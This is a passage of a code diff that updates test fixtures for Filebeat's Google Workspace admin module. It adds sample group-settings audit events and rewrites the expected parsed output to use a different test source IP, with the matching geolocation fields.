+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"DELETE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_DESCRIPTION","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"GROUP_LIST_DOWNLOAD"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"ADD_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"REMOVE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBER_BULK_UPLOAD","parameters":[{"name":"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER","value":"0"},{"name":"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER","value":"10"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBERS_DOWNLOAD"}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_NAME","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_SETTING","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"WHITELISTED_GROUPS_UPDATED","parameters":[{"name":"WHITELISTED_GROUPS","value":"a,b,c"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json
index 52257df41d75..0e6c2c2229ea 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-groups-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CREATE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CREATE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation",
@@ -26,23 +26,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -63,7 +59,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"DELETE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"DELETE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation",
@@ -78,26 +74,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 379,
+        "log.offset": 378,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -118,7 +110,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_DESCRIPTION\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_DESCRIPTION\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -133,26 +125,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 758,
+        "log.offset": 756,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -173,7 +161,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_LIST_DOWNLOAD\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_LIST_DOWNLOAD\"}}",
         "event.provider": "admin",
         "event.type": [
             "group",
@@ -185,26 +173,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1149,
+        "log.offset": 1146,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -225,7 +209,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"ADD_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"ADD_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -241,27 +225,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 1469,
+        "log.offset": 1465,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -287,7 +267,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"REMOVE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"REMOVE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -303,27 +283,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 1901,
+        "log.offset": 1896,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -349,7 +325,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -367,27 +343,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 2336,
+        "log.offset": 2330,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -413,7 +385,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -431,27 +403,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 2841,
+        "log.offset": 2834,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -477,7 +445,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -495,27 +463,23 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 3364,
+        "log.offset": 3356,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -541,7 +505,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBER_BULK_UPLOAD\",\"parameters\":[{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER\",\"value\":\"0\"},{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER\",\"value\":\"10\"}]}}",
